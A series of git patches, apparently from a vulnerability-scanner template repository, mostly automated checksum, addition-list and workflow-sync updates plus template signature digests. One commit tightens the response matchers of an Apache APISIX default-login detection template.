+http/technologies/wordpress/plugins/simple-history.yaml:c47677ff47b8b8f4177a594dccac611d01b22a0d http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:b58f773ff54e65cbd131df643230227052e56fca +http/technologies/wordpress/plugins/siteorigin-panels.yaml:5e421d52fe5aae3d5cd53f6d795181c3095d60ac +http/technologies/wordpress/plugins/smart-slider-3.yaml:5f28830f620dda88cc3c6d4906e2fe6934c74a12 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:2c6504c87079ba7fa5f6989eb97f44511dbcd0ee http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:a7018bb70e231b5ece4f7b6b2956fb92481ad6bf +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:22fc50b8b14d31c037f9211c9d77877fa1e83c53 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:7c2790e29dc73b70977ac1a11e9094862d34ddbb http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:90195b4b8ad8d8e15931bfee3babb85f962c25a7 +http/technologies/wordpress/plugins/tablepress.yaml:0cbe165ca676388474b096445e37e54c361f4dcb +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:3630dd6ce47ab060182bc9213c31f30a50a4e42c +http/technologies/wordpress/plugins/templately.yaml:566e1e14bf34de7fc9d2c82db1388eccce46a785 +http/technologies/wordpress/plugins/the-events-calendar.yaml:c24ddfa1fcd16480655d4ab2fd8993d7608b37b1 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:314efd56953bc633d05b95ed46a3da405d458170 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:c9e2bcda6a930908a8b0e1d3a718dc763a8b87eb +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6945547aa955ca0aec6425c198ee1b667a79ae94 +http/technologies/wordpress/plugins/under-construction-page.yaml:7da79f1fad17b3093100a53784765b2376de8d57 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:014a52f32bd49fdddc9c08cf8f14f42072163dc9 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:7aacad35c7c94c9f6dd8abfb2bdc892593d2edfb http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e8684f8cc4b0d9954d7047d45321c499dea6c335 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:0ceeb9aaab8678e8cbcabd26bf647ccdaf6ab8f7 +http/technologies/wordpress/plugins/webp-express.yaml:7b1d0283248c2d33cf27a8a08fc0cced9474dda8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:3f3812b7289cce33c8e881482c1a2954accec760 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:00406e7fe6e654934efa2222ee487955f711f442 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:55f6da42f441f118d0adb57c8f0c97820034df16 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:22239b1a365fe46b2bef825af19e68b6fc9bc95b http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:cb91fc264d16c19c57e592d3319bd3c15dca7c0c +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:cf53845d56b1928e797c3df0fea420906938f81f +http/technologies/wordpress/plugins/woocommerce-payments.yaml:f181096bcbf58b42defd18eb23c022b2fd16635b +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:2cdcb0cd3cd52b09572fb7693dc04048af2ffb64 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:571ec1bc605b30c3c62c136c6dadbb19d2490616 +http/technologies/wordpress/plugins/woocommerce-services.yaml:2f09e9b6da616c13dca8a54fa83bc1301e7cfce5 +http/technologies/wordpress/plugins/woocommerce.yaml:0654c9c27378f176e153f634065ebecca09f804b +http/technologies/wordpress/plugins/wordfence.yaml:dda67e03fd05bb32f9a2300187209a3636c6c511 +http/technologies/wordpress/plugins/wordpress-importer.yaml:55bf8bbaeb1182b7471837c19c68b757d16fcec7 +http/technologies/wordpress/plugins/wordpress-seo.yaml:e77355999923704b75b1b7f82962f72680a4827c http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:a17acbf9e46f87c541a9499ff7b622e6883c0a95 +http/technologies/wordpress/plugins/wp-crontrol.yaml:80a4f5cc8170375f7a04f10fd49a74809401b55f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:71f29be88bc81c153936755ec21ec81e600afbcf +http/technologies/wordpress/plugins/wp-file-manager.yaml:7bf2905b2ec1d8a399f618db40ccd43f0d7a8983 +http/technologies/wordpress/plugins/wp-google-maps.yaml:d6475e47fc5d9b40895dbca68d69098c2ab564d0 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:40bf467c8756ed316e5d3a139b6cd061db92d1f9 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:a875146e7ffc6014389f65bbe0831aca7ad93431 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:e9ced93a24b716980d28c06c042386e83dc0e495 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:040ba3795f80542354d312b89c01d115b0e7ead3 +http/technologies/wordpress/plugins/wp-optimize.yaml:82b19b227be1270525e7929bc2babe304eaf61a4 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:0665e3dd0eee43513627940a9c451814f6e860c5 +http/technologies/wordpress/plugins/wp-reset.yaml:c5f6e2b375ade7a6d7e65d0d9b3d6779b8f859fc +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6964d228e4b1ec1efebf5f849db73a05c2a1b93b +http/technologies/wordpress/plugins/wp-rollback.yaml:735ee4e85885b4f77398b5eca2ad1b9044764fdf +http/technologies/wordpress/plugins/wp-seopress.yaml:db2754b005ff6d27fc9f48f534ad1d00ff641d04 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:74b017e6e36fc299d4493e338382e35d34ee83d7 +http/technologies/wordpress/plugins/wp-smushit.yaml:9eabc87c7b01d0d90426c2b69b15a2d9472a3cd0 +http/technologies/wordpress/plugins/wp-statistics.yaml:7cd27ed57debb46391dad5f6e4049b4600f9ee41 +http/technologies/wordpress/plugins/wp-super-cache.yaml:326088abe0293b8c516bfc5df2e0c519e88a5359 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:dd65e2ffbdc84dbf3228d895fa22841fb76c5ff6 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:9dd6b5f1ccf8c9b3b30094e8edce9798dd1ca588 +http/technologies/wordpress/plugins/wpforms-lite.yaml:4e224ac7801d6da6b222acce6b826cf740ee3cf9 +http/technologies/wordpress/plugins/wps-hide-login.yaml:d481a817a049b08781cceb60404a6bef24fa74ab +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:50d517a09f92f7544c383104d325b0addd45536a http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:63c13bccce6608c2a1537bd233d9729f8e9e7eca http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8884,7 +8885,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:44107720d023cae03c471785fdd3645850f59330 +templates-checksum.txt:9f1d7692737ebf3f118b44e07f30f20b1b465c78 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1c42578929b9b8a5f95331925c8adf28d93ba851 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 08:37:01 +0000 Subject: [PATCH 219/247] Auto Generated New Template Addition List [Tue Jul 16 08:37:01 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3ac6711252e..6bc61772879 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-4257.yaml http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml +http/cves/2024/CVE-2024-6289.yaml http/exposed-panels/falcosidekick-panel.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml http/exposures/configs/apache-ozone-conf.yaml From ef4213d6382a4b1883de736b7df8c0ff4ea6524e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 08:37:12 +0000 Subject: [PATCH 220/247] Auto Generated Templates Checksum [Tue Jul 16 08:37:12 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7bf58fe294b..eda8ea2a51c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3507,6 +3507,7 @@ http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 +http/cves/2024/CVE-2024-6289.yaml:299fe09be2509d72d2233eabd1a1103466a83138 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -8885,7 +8886,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9f1d7692737ebf3f118b44e07f30f20b1b465c78 +templates-checksum.txt:af4603ad67cb4b85d5ef3af32e3f060b4225a318 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6d1bc57c14504cdeb12d6643a4cc16cb582ab21a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 08:37:21 +0000 Subject: [PATCH 221/247] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 97b66ddad44..bec11a11956 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/cves/2024/CVE-2024-1512.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' + - 'http/cves/2024/CVE-2024-4257.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' - 'http/exposed-panels/falcosidekick-panel.yaml' From e4196343d3f516d12589b2f8fa65b8fee98a0744 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 08:37:54 +0000 Subject: [PATCH 222/247] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index bec11a11956..9bf00361649 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -15,6 +15,7 @@ on: - 'http/cves/2024/CVE-2024-4257.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' + - 'http/cves/2024/CVE-2024-6289.yaml' - 'http/exposed-panels/falcosidekick-panel.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' - 'http/exposures/configs/apache-ozone-conf.yaml' From 30ee3cc88cfde9c4ed210e6f90d62862f1320143 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 08:38:08 +0000 Subject: [PATCH 223/247] Auto Template Signing [Tue Jul 16 08:38:08 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4257.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-4257.yaml b/http/cves/2024/CVE-2024-4257.yaml index 403b4f0e957..8864160a830 100644 --- a/http/cves/2024/CVE-2024-4257.yaml +++ b/http/cves/2024/CVE-2024-4257.yaml @@ -53,3 +53,4 @@ http: - 'contains(header,"text/html")' - 'status_code == 200' condition: and +# digest: 4a0a004730450221009f507c513c2400f07210853641979f030dd0c78036feca368942620bdc05ce5e02202911bb97e297e16a4863039b4bb37015179a3edd7c36831e74157f6ff0130cd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8149f7823e8feb4103f552ad235a3de902bdba52 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 08:40:47 +0000 Subject: [PATCH 224/247] Auto Generated New Template Addition List [Tue Jul 16 08:40:47 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6bc61772879..660a17e54c0 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2023/CVE-2023-4450.yaml http/cves/2023/CVE-2023-48728.yaml http/cves/2024/CVE-2024-1512.yaml http/cves/2024/CVE-2024-2330.yaml +http/cves/2024/CVE-2024-34351.yaml http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-4257.yaml http/cves/2024/CVE-2024-4879.yaml From 23bcfbd03666215ff37877ebeb459b9568509813 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 08:40:54 +0000 Subject: [PATCH 225/247] Auto Generated Templates Checksum [Tue Jul 16 08:40:54 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index eda8ea2a51c..fa34f926557 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3474,6 +3474,7 @@ http/cves/2024/CVE-2024-33610.yaml:24618eb8295fd20c2eaafe525e895edb63a1c04c http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b +http/cves/2024/CVE-2024-34351.yaml:538c16df5562ee928dbf6ac41aee3bda4ecaf6d5 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 @@ -3491,7 +3492,7 @@ http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 -http/cves/2024/CVE-2024-4257.yaml:8876e33e746a9fd57af6a76fcac1c71ff3f00c4f +http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a @@ -8886,7 +8887,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:af4603ad67cb4b85d5ef3af32e3f060b4225a318 +templates-checksum.txt:b8d3d41c80b63f06b42a2ee2956eded98bc66765 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ae44709fb62535ab41844ef76716071ef777743b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 08:41:41 +0000 Subject: [PATCH 226/247] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9bf00361649..e7cfe20f9be 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/cves/2023/CVE-2023-48728.yaml' - 'http/cves/2024/CVE-2024-1512.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' + - 'http/cves/2024/CVE-2024-34351.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' - 'http/cves/2024/CVE-2024-4257.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' From 2603fc95da3ed5f3fd8f5e57e64d23bcba08099b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 08:42:34 +0000 Subject: [PATCH 227/247] Auto Template Signing [Tue Jul 16 08:42:34 UTC 2024] :robot: --- http/cves/2024/CVE-2024-34351.yaml | 1 + http/cves/2024/CVE-2024-6289.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-34351.yaml b/http/cves/2024/CVE-2024-34351.yaml index b0bc3df145d..7b9c229660e 100644 --- a/http/cves/2024/CVE-2024-34351.yaml +++ b/http/cves/2024/CVE-2024-34351.yaml @@ -47,3 +47,4 @@ http: part: body words: - "The requested resource isn't a valid image" +# digest: 4a0a0047304502201cb22b31416f184c4beeafb402db2f170f661e1cb990d6fd5ab034d847bfa51c022100fdeb601572c1a7b843247ef5294a0243a39df1a90310dcb0fc97a3edd48bde6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-6289.yaml b/http/cves/2024/CVE-2024-6289.yaml index fb0df7815e5..4e440bdd9e2 100644 --- a/http/cves/2024/CVE-2024-6289.yaml +++ b/http/cves/2024/CVE-2024-6289.yaml @@ -58,3 +58,4 @@ http: - type: kval kval: - location +# digest: 4a0a00473045022020d4b2a669248c99076dbae2a47bd27614ff41baa828ef6b8f09219e7f5804c10221008cea48e05a376902a9024b466cdcb72992fa8239336fc3085e7ba319e6627de7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0adba0d3f1469ee8411595be1fbf4ffc5b9c91ad Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 16 Jul 2024 14:33:12 +0530 Subject: [PATCH 228/247] Fix FP apisix-default-login.yaml --- .../apache/apisix-default-login.yaml | 22 ++++++++++++------- 1 file changed, 14 insertions(+), 8 deletions(-) diff --git a/http/default-logins/apache/apisix-default-login.yaml b/http/default-logins/apache/apisix-default-login.yaml index 87b1b252e08..ddbff161255 100644 --- a/http/default-logins/apache/apisix-default-login.yaml +++ b/http/default-logins/apache/apisix-default-login.yaml @@ -1,7 +1,7 @@ id: apisix-default-login info: - name: Apache Apisix Default Admin Login + name: Apache Apisix Admin - Default Login author: pdteam severity: high description: An Apache Apisix default admin login was discovered. @@ -38,15 +38,21 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word + part: body words: - - '"data"' - - '"token"' - - '"code":0' + - '"data":' + - '"token":' + - '{"code":0' condition: and + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + # digest: 4a0a00473045022100ed7246599d057edeb05c9cbb8f8e6e646ecd8f30c16f824b8fcd3fdb7fc0a4700220730ebc8209a21fced7ba192032e7731959b3eb50f22441f85ac5b3ef82e97e48:922c64590222798bb761d5b6d8e72950 From 74e3866aef6d40255e9f2494b38298c52aaab470 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 09:06:42 +0000 Subject: [PATCH 229/247] Auto Generated New Template Addition List [Tue Jul 16 09:06:42 UTC 2024] :robot: From 62ee582055f32aff2272b790511eee4cc2e63a87 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 09:06:49 +0000 Subject: [PATCH 230/247] Auto Generated Templates Checksum [Tue Jul 16 09:06:49 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index fa34f926557..cf794f8e9d7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3474,7 +3474,7 @@ 